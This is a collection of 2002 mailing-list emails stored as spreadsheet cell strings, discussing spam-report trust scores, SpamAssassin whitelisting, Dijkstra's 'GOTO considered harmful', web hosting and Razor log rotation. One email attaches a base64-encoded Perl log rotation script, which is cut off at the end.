    <t>Craig R.Hughes wrote:\n &gt;\n &gt; On Thursday, August 8, 2002, at 11:15  AM, Mika Hirvonen wrote:\n &gt;\n &gt;&gt; I do not know the algorithms used to calculate confidence values, but it\n &gt;&gt; probably penalizes heavily when someone revokes spam that everyone else\n &gt;&gt; considers as spam. Or at least it should.\n &gt;\n &gt;\n &gt; The problem with that is that invariably, there are "gray" mails.  Some\n &gt; people will vote "spam", others will vote "nonspam" -- under your\n &gt; proposed system, anyone who ever calls "gray" mail nonspam will have a\n &gt; shitty trust score.  And once you have a shitty trust score, your own\n &gt; submissions won't even be used to flag your own spam as spam.  That's\n &gt; bound to confuse a lot of people.  "But I just marked that exact message\n &gt; as spam.  Why is it not being considered spam?  I'm an honest submitter."\n\nI assume that how much the trust goes down depends of the proportion of\nreport vs revoke. If everybody except one says that a mail is spam, the\none guy will see his trust go down dramatically. If you are with the\nmajority, your trust goes up. If you are against the majority, your\ntrust goes down. If people 50-50, whatever you vote, your neither\nagainst the majority nor with it, so your trust won't change. So your\n"gray" mail won't have much influence on your trust (neither good nor\nbad, just... gray)\n\n\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: razor-users@example.sourceforge.net\nFrom: Jehan &lt;nahor@bravobrava.com&gt;\nDate: Thu, 08 Aug 2002 17:25:57 -0700</t>
  </si>
  <si>
    <t>Thu, 08 Aug 2002 17:25:57 -0700</t>
  </si>
  <si>
    <t>Adam Goryachev wrote:\n&gt; Just my $1 worth...\n\nShould we trust you more because you're worth $1 instead of the usual 2 \ncents?\n;)\n\n	Jehan\n\n\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: razor-users@example.sourceforge.net\nFrom: Jehan &lt;nahor@bravobrava.com&gt;\nDate: Thu, 08 Aug 2002 17:20:44 -0700</t>
  </si>
  <si>
    <t>Thu, 08 Aug 2002 17:20:44 -0700</t>
  </si>
  <si>
    <t>Craig R.Hughes wrote:\n&gt; \n&gt; On Thursday, August 8, 2002, at 11:15  AM, Mika Hirvonen wrote:\n&gt; \n&gt;&gt; I do not know the algorithms used to calculate confidence values, but it\n&gt;&gt; probably penalizes heavily when someone revokes spam that everyone else\n&gt;&gt; considers as spam. Or at least it should.\n&gt; \n&gt; \n&gt; The problem with that is that invariably, there are "gray" mails.  Some \n&gt; people will vote "spam", others will vote "nonspam" -- under your \n&gt; proposed system, anyone who ever calls "gray" mail nonspam will have a \n&gt; shitty trust score.  And once you have a shitty trust score, your own \n&gt; submissions won't even be used to flag your own spam as spam.  That's \n&gt; bound to confuse a lot of people.  "But I just marked that exact message \n&gt; as spam.  Why is it not being considered spam?  I'm an honest submitter."\n\nI assume that how much the trust goes down depends of the proportion of \nreport vs revoke. If everybody except one says that a mail is spam, the \none guy will see his trust go down dramatically. If you are with the \nmajority, your trust goes up. If you are against the majority, your \ntrust goes down. If people 50-50, whatever you vote, your neither \nagainst the majority nor with it, so your trust won't change. So your\n"gray" mail won't have much influence on your trust (neither good nor \nbad, just... gray)\n\n\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: Ross Vandegrift &lt;ross@willow.seitz.com&gt;\nFrom: yyyy@spamassassin.taint.org (Justin Mason)\nDate: Thu, 08 Aug 2002 14:27:10 +0100</t>
  </si>
  <si>
    <t>Thu, 08 Aug 2002 14:27:10 +0100</t>
  </si>
  <si>
    <t>Re: [SAtalk] whitelisting mailing lists</t>
  </si>
  <si>
    <t>Ross Vandegrift said:\n\n&gt; Won't this whitelist spams sent to mailing lists though?\n\nonly if you've whitelisted the mailing list.  In that case, c'est la vie\n;)\n\n--j.\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Padraig Brady &lt;padraig.brady@corvil.com&gt;\nDate: Thu, 08 Aug 2002 13:10:37 +0100</t>
  </si>
  <si>
    <t>Thu, 08 Aug 2002 13:10:37 +0100</t>
  </si>
  <si>
    <t>[ILUG] Alan Cox doesn't like 2.5 so far!</t>
  </si>
  <si>
    <t>Yikes, hope he's not serious! -------- Original Message -------- Subject: Re: [bug, 2.5.29, IDE] partition table corruption? Date: 08 Aug 2002 14:23:53 +0100 From: Alan Cox  To: martin@dalecki.de [IDE specific argument snipped] Thank you for reminding me why I've given up on the 2.5 kernel ever working. Fortunately free software is self correcting so the tree can be forked into something workable --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Dave Wilson &lt;dave.wilson@heanet.ie&gt;\nDate: Thu, 08 Aug 2002 12:18:21 +0100</t>
  </si>
  <si>
    <t>Thu, 08 Aug 2002 12:18:21 +0100</t>
  </si>
  <si>
    <t>&gt; Interesting. I've always wondered about things 'considered' to be bad. \n&gt; Example the GOTO, most languages support a goto of some sort, so are gotos really bad?\n\nOh goodie. My final year project rears its head :-)\n\n&gt; Is a loop or a recursive call actually any better than a goto \n&gt; or is the goto used as a kind of common enemy of \n&gt; programming syntax\n\nMuch as I would like to answer an unqualified "yes", I must admit: if \nyou already code in a style that makes heavy use of GOTOs, coding in the \nsame style with GOSUBs or function calls does not improve code. Much the \nsame as when the manuals on "modular coding" said to write modules that \nwould fit on a single sheet of computer paper, lots of coders proceeded \nto split their code into arbitrary 60-line chunks. :)\n\nHowever, "Go-to considered harmful" points out that to analyse (==debug) \ncode, you need to be able to tell what the point of execution is, and \nwhat the values of the variables are at that point. This is an easy(tm) \njob if the code uses assignment, if(), for() and functions, but not if \nit uses GOTO. (See [URL]http://www.cs.utexas.edu[/URL] \nfor the full letter).\n\nDespite being one of Dijkstra's brain-damaged children who learned BASIC \nat an early age :) I never use GOTO anymore (or any of its bastard \noffspring like break, continue, fudged function calls with sleight of \nhand in the variables). My code is longer than it might be if I had used \nGOTO at a critical, handy point. However, code is a bit like networks - \nyou always end up adding bits on where you didn't expect to - and the \nbenefit is felt when another person (like myself but in three months \ntime) is modifying or debugging it and doesn't have to go through the \nhassle of dealing with the impact of the GOTO.\n\nDave\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.cs.utexas.edu http://www.linux.ie</t>
  </si>
  <si>
    <t>To: kevin lyda &lt;kevin+dated+1029235349.f17378@ie.suberic.net&gt;\nFrom: Padraig Brady &lt;padraig.brady@corvil.com&gt;\nDate: Thu, 08 Aug 2002 12:00:04 +0100</t>
  </si>
  <si>
    <t>Thu, 08 Aug 2002 12:00:04 +0100</t>
  </si>
  <si>
    <t>kevin lyda wrote:\n&gt; speaking of things considered harmful, line lengths of over 80 chars\n&gt; are considered harmful.  cut it out.\n\n:-) In fairness he was using webmail\n\n&gt; On Thu, Aug 08, 2002 at 11:27:59AM +0100, wintermute wrote:\n&gt; \n&gt;&gt;Interesting. I've always wondered about things 'considered' to be bad. \n&gt;&gt;Example the GOTO, most languages support a goto of some sort, so are\n&gt;&gt;gotos really bad?\n&gt; \n&gt; \n&gt; if used properly, they actually can make code more readable.  but those\n&gt; proper occasions are quite rare really.  it's a good idea to avoid them\n&gt; since over use of goto will create what niall calls "write-only code."\n\nYes a clever term usually (and deservedly) attributed to perl.\nOf course you can create write-only code in any language.\nThere's even a competition for obfuscated C code which is always\nworth a look: [URL]http://www.es.ioccc.org[/URL]\n\nPdraig.\n\np.s. what sort of processing do you do with:\nkevin+dated+1029235349.f17378@ie.suberic.net\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.es.ioccc.org http://www.linux.ie</t>
  </si>
  <si>
    <t>To: "'ilug@linux.ie'" &lt;ilug@linux.ie&gt;\nFrom: Padraig Brady &lt;padraig.brady@corvil.com&gt;\nDate: Thu, 08 Aug 2002 11:11:29 +0100</t>
  </si>
  <si>
    <t>Thu, 08 Aug 2002 11:11:29 +0100</t>
  </si>
  <si>
    <t>[ILUG] slashdot EW Dijkstra humor</t>
  </si>
  <si>
    <t>Thought this was funny.\nIn the slashdot thread about\nEW Dijkstra passing away on\ntuesday, there was:\n\nGOTO Heaven\n       Re:GOTO Heaven\n       I'll bet he gets there by the shortest path.\n\nReferring to his "Goto considered harmful" etc.\n\nSad to see these people go. 3 others I've\nnoticed lately were: Richard Stevens, Jim Ellis\nand Jon Postel.\n\nPdraig.\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "Tony L. Svanstrom" &lt;tony@svanstrom.com&gt;\nFrom: Rich Wellner &lt;spamassassin@objenv.com&gt;\nDate: Thu, 08 Aug 2002 08:58:01 -0500</t>
  </si>
  <si>
    <t>Thu, 08 Aug 2002 08:58:01 -0500</t>
  </si>
  <si>
    <t>Rich Wellner &lt;spamassassin@objenv.com&gt;</t>
  </si>
  <si>
    <t>Re: [SAtalk] Is this a violation of TRADEMARK?</t>
  </si>
  <si>
    <t>"Tony L. Svanstrom"  writes: &gt; IMHO it's wrong that any company is allowed to use the name of a public &gt; project commercially, while others aren't; esp. when it's a name that tells &gt; Average Joe that that version is so much better than the free one. Dude, take that one up with Redhat, Suse, IBM or any of the other folks using the name of a public project (i.e. Linux) for a commercial product.  ;-) This is not only a concept with precedent it's actually quite common. rw2 ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Spamassassin-talk mailing list Spamassassin-talk@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: beberg@mithral.com, harley@argote.ch\nFrom: grlygrl201@aol.com\nDate: Thu, 08 Aug 2002 07:35:09 -0400</t>
  </si>
  <si>
    <t>Thu, 08 Aug 2002 07:35:09 -0400</t>
  </si>
  <si>
    <t>beberg@mithral.com, harley@argote.ch</t>
  </si>
  <si>
    <t>In a message dated Wed, 7 Aug 2002 5:17:55 PM Eastern Standard Time, beberg@mithral.com writes:\n\n&gt; \n&gt; \n&gt; On Wed, 7 Aug 2002, Robert Harley wrote:\n&gt; \n&gt; &gt; Hmm... now I have an asymptotically faster precomputation algorithm\n&gt; \n&gt; Woo, faster is better... But what have you done about all those patents that\n&gt; prevent anyone from going near ECC in the first place, \n&gt; hmmmmmm?\n&gt; \n&gt; - Adam L. "Duncan" Beberg\n\nSomething tells me Adam's security blanket was very wet and that Adam had a propensity for throwing it on his stuffed animals.\n\nGeege\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: zzzzteana@yahoogroups.com\nFrom: "Tim Chapman" &lt;timc@2ubh.com&gt;\nDate: Thu, 05 Sep 2002 22:54:52 +0100</t>
  </si>
  <si>
    <t>Thu, 05 Sep 2002 22:54:52 +0100</t>
  </si>
  <si>
    <t>Re: [zzzzteana] Free Web Hosting?</t>
  </si>
  <si>
    <t>Bill:\n&gt; I've decided that I ought to put some of my writing samples on-line for\n&gt; potential employers to mock. And I don't want to pay for it. There are still\n&gt; a couple dozen places to do this, do any of you have preferences?\n&gt;\nGetting your own domain needn't be expensive, looks more professional, and\nyou're not going to suddenly lose your site with little or no notice (yes,\nI'm still smarting from bastard Geocities). I registered mine through\n[URL]http://www.easyspace.com[/URL] - works out about a pound a week for registration\nand 30Mb hosting. It's a valuable service, there's no reason not to expect\nto pay.\n\nTimC\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\nLooking for a more powerful website? Try GeoCities for $8.95 per month.\nRegister your domain name ([URL]http://your-name.com[/URL] More storage! No ads!\n[URL]http://geocities.yahoo.com[/URL]\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>http://www.easyspace.com http://your-name.com http://geocities.yahoo.com http://us.click.yahoo.com http://docs.yahoo.com</t>
  </si>
  <si>
    <t>To: David Rees &lt;dbr@greenhydrant.com&gt;\nFrom: Leland Woodbury &lt;leland@lelandwoodbury.com&gt;\nDate: Thu, 05 Sep 2002 22:12:59 -0400</t>
  </si>
  <si>
    <t>Thu, 05 Sep 2002 22:12:59 -0400</t>
  </si>
  <si>
    <t>Leland Woodbury &lt;leland@lelandwoodbury.com&gt;</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format.\n--------------050101050502080302080407\nContent-Type: text/plain; charset=us-ascii; format=flowed\nContent-Transfer-Encoding: 7bit\n\nI found a nice little Perl script for this purpose called rotate, which \nmakes the process of rotating log files very simple.  If there's an \nofficial source for this script, I couldn't find it.  (My hosting \nprovider, pair.com, has it installed, and that's where I found it.) \n However, redistribution appears to be allowed, so I've attached it.\n\nGood luck...\n\nL\n\nDavid Rees wrote:\n\n&gt;On Thu, Sep 05, 2002 at 08:53:16PM -0400, Theo Van Dinter wrote:\n&gt;  \n&gt;\n&gt;&gt;On Thu, Sep 05, 2002 at 06:16:57PM -0500, Mike Burger wrote:\n&gt;&gt;    \n&gt;&gt;\n&gt;&gt;&gt;You might be better asking this on the spamassassin-talk list.  The folks \n&gt;&gt;&gt;there will almost definitely have an answer for this.\n&gt;&gt;&gt;      \n&gt;&gt;&gt;\n&gt;&gt;I posted a fairly lengthy complete answer to this problem and how to\n&gt;&gt;get around it in SA 2.41 on the spamassassin-talk list. :)\n&gt;&gt;    \n&gt;&gt;\n&gt;\n&gt;Thanks for the post there, it answered all my questions about\n&gt;spamassassin/razor interaction.\n&gt;\n&gt;Now for a razor question:\n&gt;\n&gt;I'm worried about having a server full of razor-agent.log files which keep\n&gt;on growing.  Is it possible to configure razor log via SYSLOG to make it\n&gt;easy to rotate logs?  Searching through the man pages didn't turn anything\n&gt;up...  Otherwise I'll have to write a script to go through each user's home\n&gt;directory looking for razor-agent.log files to rotate periodically.\n&gt;\n&gt;Thanks,\n&gt;Dave\n&gt;\n&gt;\n&gt;-------------------------------------------------------\n&gt;This sf.net email is sponsored by: OSDN - Tired of that same old\n&gt;cell phone?  Get a new here for FREE!\n&gt;[URL]https://www.inphonic.com[/URL]\n&gt;_______________________________________________\n&gt;Razor-users mailing list\n&gt;Razor-users@lists.sourceforge.net\n&gt;[URL]https://lists.sourceforge.net[/URL]\n&gt;  \n&gt;\n\n--------------050101050502080302080407\nContent-Type: application/x-java-applet;version=1.1.1;\n name="rotate"\nContent-Transfer-Encoding: base64\nContent-Disposition: inline;\n filename="rotate"\n\nIyEvdXNyL2Jpbi9wZXJsCjsjCjsjIENvcHlyaWdodCAoYykgMTk5NS0xOTk5CjsjCUlrdW8g\nTmFrYWdhd2EuIEFsbCByaWdodHMgcmVzZXJ2ZWQuCjsjCjsjIFJlZGlzdHJpYnV0aW9uIGFu\nZCB1c2UgaW4gc291cmNlIGFuZCBiaW5hcnkgZm9ybXMsIHdpdGggb3Igd2l0aG91dAo7IyBt\nb2RpZmljYXRpb24sIGFyZSBwZXJtaXR0ZWQgcHJvdmlkZWQgdGhhdCB0aGUgZm9sbG93aW5n\nIGNvbmRpdGlvbnMKOyMgYXJlIG1ldDoKOyMKOyMgMS4gUmVkaXN0cmlidXRpb25zIG9mIHNv\ndXJjZSBjb2RlIG11c3QgcmV0YWluIHRoZSBhYm92ZSBjb3B5cmlnaHQKOyMgICAgbm90aWNl\nIHVubW9kaWZpZWQsIHRoaXMgbGlzdCBvZiBjb25kaXRpb25zLCBhbmQgdGhlIGZvbGxvd2lu\nZwo7IyAgICBkaXNjbGFpbWVyLgo7IyAyLiBSZWRpc3RyaWJ1dGlvbnMgaW4gYmluYXJ5IGZv\ncm0gbXVzdCByZXByb2R1Y2UgdGhlIGFib3ZlIGNvcHlyaWdodAo7IyAgICBub3RpY2UsIHRo\naXMgbGlzdCBvZiBjb25kaXRpb25zIGFuZCB0aGUgZm9sbG93aW5nIGRpc2NsYWltZXIgaW4g\ndGhlCjsjICAgIGRvY3VtZW50YXRpb24gYW5kL29yIG90aGVyIG1hdGVyaWFscyBwcm92aWRl\nZCB3aXRoIHRoZSBkaXN0cmlidXRpb24uCjsjCjsjIFRISVMgU09GVFdBUkUgSVMgUFJPVklE\nRUQgQlkgVEhFIEFVVEhPUiBBTkQgQ09OVFJJQlVUT1JTIGBgQVMgSVMnJyBBTkQKOyMgQU5Z\nIEVYUFJFU1MgT1IgSU1QTElFRCBXQVJSQU5USUVTLCBJTkNMVURJTkcsIEJVVCBOT1QgTElN\nSVRFRCBUTywgVEhFCjsjIElNUExJRUQgV0FSUkFOVElFUyBPRiBNRVJDSEFOVEFCSUxJVFkg\nQU5EIEZJVE5FU1MgRk9SIEEgUEFSVElDVUxBUgo7IyBQVVJQT1NFIEFSRSBESVNDTEFJTUVE\nLiAgSU4gTk8gRVZFTlQgU0hBTEwgVEhFIEFVVEhPUiBPUiBDT05UUklCVVRPUlMKOyMgQkUg\nTElBQkxFIEZPUiBBTlkgRElSRUNULCBJTkRJUkVDVCwgSU5DSURFTlRBTCwgU1BFQ0lBTCwg\nRVhFTVBMQVJZLAo7IyBPUiBDT05TRVFVRU5USUFMIERBTUFHRVMgKElOQ0xVRElORywgQlVU\nIE5PVCBMSU1JVEVEIFRPLCBQUk9DVVJFTUVOVAo7IyBPRiBTVUJTVElUVVRFIEdPT0RTIE9S\nIFNFUlZJQ0VTOyBMT1NTIE9GIFVTRSwgREFUQSwgT1IgUFJPRklUUzsgT1IKOyMgQlVTSU5F\nU1MgSU5URVJSVVBUSU9OKSBIT1dFVkVSIENBVVNFRCBBTkQgT04gQU5ZIFRIRU9SWSBPRiBM\nSUFCSUxJVFksCjsjIFdIRVRIRVIgSU4gQ09OVFJBQ1QsIFNUUklDVCBMSUFCSUxJVFksIE9S\nIFRPUlQgKElOQ0xVRElORyBORUdMSUdFTkNFCjsjIE9SIE9USEVSV0lTRSkgQVJJU0lORyBJ\nTiBBTlkgV0FZIE9VVCBPRiBUSEUgVVNFIE9GIFRISVMgU09GVFdBUkUsCjsjIEVWRU4gSUYg\nQURWSVNFRCBPRiBUSEUgUE9TU0lCSUxJVFkgT0YgU1VDSCBEQU1BR0UuCjsjCjsjICRJZDog\ncm90YXRlLHYgMS42IDE5OTkvMTEvMTAgMjM6MTI6MjggaWt1byBFeHAgJAo7Iwo7IyBIb3cg\ndG8gdXNlIGByb3RhdGUnIHByb2dyYW06CjsjCjsjICAgVG8gcm90YXRlICIvdmFyL2xvZy94\neHgubG9nIiB0byAiL3Zhci9sb2cveHh4LmxvZy5vbGQiLCBhbmQKOyMgICBjcmVhdGUgYSBu\nZXcgZmlsZSAiL3Zhci9sb2cveHh4LmxvZyI6CjsjCXJvdGF0ZSAvdmFyL2xvZy94eHgubG9n\nCjsjCjsjICAgSWYgeW91IHdhbnQgdG8gcm90YXRlIGZpbGVzIHdpdGggc3VmZml4ZXMsIHRy\neSBhZGRpdGlvbmFsCjsjICAgYXJndW1lbnQgZm9yIGByb3RhdGUnIGNvbW1hbmQuCjsjCXJv\ndGF0ZSAvdmFyL2xvZy94eHgubG9nIDIgMSAwCjsjCjsjICAgWW91IGNhbiBzcGVjaWZ5IHRo\nZSBvd25lci9ncm91cCBvciBmaWxlIHBlcm1pc3Npb24gbW9kZSBmb3IKOyMgICB0aGUgbmV3\nIGZpbGUgKGxpa2UgYGluc3RhbGwnIGNvbW1hbmQpOgo7Iwlyb3RhdGUgLW8gcm9vdCAtZyB3\naGVlbCAtbSA2NDQgL3Zhci9sb2cvbWVzc2FnZXMgMiAxIDAKOyMKOyMgICBZb3UgY2FuIGFs\nc28gY29tcHJlc3Mgcm90YXRlZCBmaWxlIHdpdGggYGd6aXAnOgo7Iwlyb3RhdGUgLXogL3Zh\nci9sb2cvYWNjZXNzLmxvZyAyIDEgMAo7Iwo7IyAgIG9yIHdpdGggYGNvbXByZXNzJzoKOyMJ\ncm90YXRlIC1aIC92YXIvbG9nL2FjY2Vzcy5sb2cgMiAxIDAKOyMKOyMgVGhpcyBpcyBiZWNh\ndXNlIHdlIHN1cHBvcnRzIHBlcmwgdmVyc2lvbiA0LgpyZXF1aXJlICdnZXRvcHRzLnBsJzsK\nCjsjIEdldCBwcm9ncmFtIG5hbWUKKCRwcm9ncmFtKSA9ICgkMCA9fiBtJShbXi9dKykkJSk7\nCgo7IyBGb3IgemVybyBiYXNlZCBpbmRleC4KJFsgPSAwOwoKOyMgU2hvdyBkZWJ1ZyBsb2cg\ndG8gU1RET1VULgpzdWIgZGVidWcgewoJbG9jYWwoJF8pOyAjIHVzZWQgaW4gZ3JlcC4KCWdy\nZXAoKHByaW50ICIkX1xuIiksIEBfKSBpZiAkb3B0X3Y7Cn0KCjsjIEluaXRpYWxpemUgb3B0\naW9ucyAoZm9yICJwZXJsIC1jdyIpLgp1bmRlZiAkb3B0X047CnVuZGVmICRvcHRfVDsKdW5k\nZWYgJG9wdF9aOwp1bmRlZiAkb3B0X2c7CnVuZGVmICRvcHRfbTsKdW5kZWYgJG9wdF9uOwp1\nbmRlZiAkb3B0X287CnVuZGVmICRvcHRfdDsKdW5kZWYgJG9wdF92Owp1bmRlZiAkb3B0X3o7\nCgo7IyBQYXJzaW5nIG9wdGlvbnMKdW5sZXNzICgmR2V0b3B0cygiTlRaZzptOm5vOnR2eiIp\nICYmIGRlZmluZWQoJHRhcmdldCA9IHNoaWZ0KSkgewoJZGllIDw8IkVORCI7ClVzYWdlOiAk\ncHJvZ3JhbSBbb3B0aW9uc10gcGF0aCBbc3VmZml4IHN1ZmZpeCAuLi5dCk9wdGlvbnM6Cgkt\ndgl2ZXJib3NlIG1vZGUuCgktbglkbyBub3QgcmVhbCB3b3JrLiBvbmx5IHNob3cgcHJvY2Vz\nc2luZy4KCS1OCWRvIG5vdCBjcmVhdGUgYSBuZXcgZmlsZS4KCS16CWNvbXByZXNzIHdpdGgg\nYGd6aXAnLgoJLVoJY29tcHJlc3Mgd2l0aCBgY29tcHJlc3MnLgoJLW8Jc3BlY2lmeSBvd25l\nci4KCS1nCXNwZWNpZnkgZ3JvdXAuCgktbQlzcGVjaWZ5IG1vZGUuCgktVAl1c2UgYFlZWVkt\nTU0tREQnIChnaXZlbiBieSBjdXJyZW50IHRpbWUpIGFzIHRoZSBkZWZhdWx0CgkJc3VmZml4\nLCBpbnN0ZWFkIG9mIGBvbGQnLgoJLXQJdXNlIGBZWVlZLU1NLUREJyAoZnJvbSBsYXN0IG1v\nZGlmaWVkIHRpbWUgb2YgdGhlIHRhcmdldCkKCQlhcyB0aGUgZGVmYXVsdCBzdWZmaXgsIGlu\nc3RlYWQgb2YgYG9sZCcuCkVORAp9Cgo7IyBUZXN0IG1vZGUgcmVxdWlyZXMgdmVyYm9zZSBv\ncHRpb24KJG9wdF92KysgaWYgJG9wdF9uOwoKOyMgSWYgbm8gc3VmZml4IHdhcyBnaXZlbiwg\nd2UgZ2VuZXJhdGUgZGVmYXVsdCBvbmUuCnVubGVzcyAoQEFSR1YpIHsKCWlmICgkb3B0X1Qg\nfHwgJG9wdF90KSB7CgkJaWYgKCRvcHRfdCAmJiAhIC1lICR0YXJnZXQpIHsKCQkJZGllKCIk\ndGFyZ2V0IG11c3QgZXhpc3QgaWYgLXQgZmxhZyBpcyBzcGVjaWZpZWQuXG4iKTsKCQl9CgkJ\nJHQgPSAkb3B0X3QgPyAoc3RhdCgkdGFyZ2V0KSlbOV0gOiB0aW1lOwoJCUB0ID0gcmV2ZXJz\nZSgobG9jYWx0aW1lKCR0KSlbMC4uNV0pOwoJCSR0WzBdICs9IDE5MDA7CgkJJHRbMV0rKzsK\nCQlAQVJHViA9IChzcHJpbnRmKCIlMDRkLSUwMmQtJTAyZCIsIEB0KSk7Cgl9IGVsc2UgewoJ\nCUBBUkdWID0gKCdvbGQnKTsKCX0KfQoKOyMgUm90YXRlIHRoZSB0YXJnZXQgZmlsZS4KJnNh\nZmVfcm90YXRlKCR0YXJnZXQsIEBBUkdWKTsKCjsjIFRvdWNoIHRoZSBuZXcgb25lLgomc2Fm\nZV9jcmVhdGUoJHRhcmdldCkgdW5sZXNzICRvcHRfTjsKCjsjIE5vcm1hbCB0ZXJtaW5hdGlv\nbi4KZXhpdDsKCjsjIFRvdWNoIGEgZmlsZS4gQ3JlYXRlIGEgbmV3IG9uZSBpZiBpdCBkb2Vz\nIG5vdCBleGlzdC4Kc3ViIHRvdWNoIHsKCWxvY2FsKCRhKSA9IEBfOwoJbG9jYWwoKkZJTEUp\nOwoKCSRhIG5lICcnICYmIG9wZW4oRklMRSwgJz4+Jy4kYSkgJiYgY2xvc2UoRklMRSkgJiYg\nLWUgJGE7Cn0KCjsjCnN1YiBzYWZlX3VubGluayB7Cglsb2NhbCgkYSkgPSBAXzsKCglpZiAo\nLWUgJGEpIHsKCQkmZGVidWcoInVubGluayBcIiRhXCIiKTsKCQkkb3B0X24gfHwgdW5saW5r\nKCRhKSB8fCBkaWUoInVubGluaygkYSk6ICQhIik7Cgl9Cn0KCjsjCnN1YiBzYWZlX3JlbmFt\nZSB7Cglsb2NhbCgkYSwgJGIpID0gQF87ICMgZnJvbSwgdG8KCglpZiAoLWUgJGEpIHsKCQkm\nZGVidWcoInJlbmFtZSBcIiRhXCIgdG8gXCIkYlwiIik7CgkJJG9wdF9uIHx8IHJlbmFtZSgk\nYSwgJGIpIHx8IGRpZSgicmVuYW1lKCRhLCAkYik6ICQhIik7Cgl9Cn0KCjsjCnN1YiBzYWZl\nX2NvbXByZXNzIHsKCWxvY2FsKCRhKSA9IEBfOwoKCWlmICgteiAkYSkgeyAjIGNvbXByZXNz\nIHdpbGwgZmFpbCBpbiB0aGlzIGNhc2UKCQkmZGVidWcoIndlIHdvbid0IGNvbXByZXNzIHpl\ncm8tc2l6ZWQgZmlsZTogXCIkYVwiIik7Cgl9IGVsc2UgewoJCSZkZWJ1ZygiY29tcHJlc3Mg\nXCIkYVwiIik7CgkJJG9wdF9uCXx8IHN5c3RlbSgnY29tcHJlc3MnLCAkYSkgPT0gMAoJCQl8\nfCBkaWUoInN5c3RlbShjb21wcmVzcywgJGEpOiBmYWlsdXJlLlxuIik7Cgl9Cn0KCjsjCnN1\nYiBzYWZlX2d6aXAgewoJbG9jYWwoJGEpID0gQF87CgoJJmRlYnVnKCJnemlwIFwiJGFcIiIp\nOwoJJG9wdF9uCXx8IHN5c3RlbSgnZ3ppcCcsICRhKSA9PSAwCgkJfHwgZGllKCJzeXN0ZW0o\nZ3ppcCwgJGEpOiBmYWlsdXJlLlxuIik7Cn0KCjsjIENyZWF0ZSBhIG5ldyBvbmUKc3ViIHNh\nZmVfY3JlYXRlIHsKCWxvY2FsKCRhKSA9IHNoaWZ0OwoKCSZkZWJ1ZygidG91Y2ggXCIkYVwi\nIik7Cgkkb3B0X24gfHwgJnRvdWNoKCRhKSB8fCBkaWUoInRvdWNoKCRhKTogJCEiKTsKCgkj\nIHNldCBvd25lciBhbmQgZ3JvdXAKCWlmIChkZWZpbmVkKCRvcHRfbykgfHwgZGVmaW5lZCgk\nb3B0X2cpKSB7CgkJbG9jYWwoJHVpZCwgJGdpZCkgPSAoc3RhdCgkYSkpWzQsIDVdOwoJCSFk\nZWZpbmVkKCRvcHRfbykKCQkJfHwgKCgkdWlkID0gJG9wdF9vKSA9fiAvXlxkKyQvKQoJCQl8\nfCBkZWZpbmVkKCR1aWQgPSBnZXRwd25hbSgkb3B0X28pKQoJCQl8fCBkaWUoImdldHB3bmFt\nKCRvcHRfbyk6ICQhIik7CgkJIWRlZmluZWQoJG9wdF9nKQoJCQl8fCAoKCRnaWQgPSAkb3B0\nX2cpID1+IC9eXGQrJC8pCgkJCXx8IGRlZmluZWQoJGdpZCA9IGdldGdybmFtKCRvcHRfZykp\nCgkJCXx8IGRpZSgiZ2V0Z3JuYW0oJG9wdF9nKTogJCEiKTsKCQkmZGVidWcoImNob3duKCR1\naWQsICRnaWQsIFwiJGFcIikiKTsKCQkkb3B0X24JfHwgY2hvd24oJHVpZCwgJGdpZCwgJGEp\nCgkJCXx8IGRpZSgiY2hvd24oJGEpOiAkISIpOwoJfQoKCSMgc2V0IGZpbGUgbW9kZQoJaWYg\nKGRlZmluZWQoJG9wdF9tKSkgewoJCSRvcHRfbSA9fiAvXlxkKyQvIHx8IGRpZSAiaWxsZWdh\nbCBtb2RlOiAkb3B0X21cbiI7CgkJJG9wdF9tID0gb2N0KCRvcHRfbSk7CgkJJmRlYnVnKCJj\naG1vZCAiLnNwcmludGYoIiUwNG8iLCAkb3B0X20pLiIsIFwiJGFcIiIpOwoJCSRvcHRfb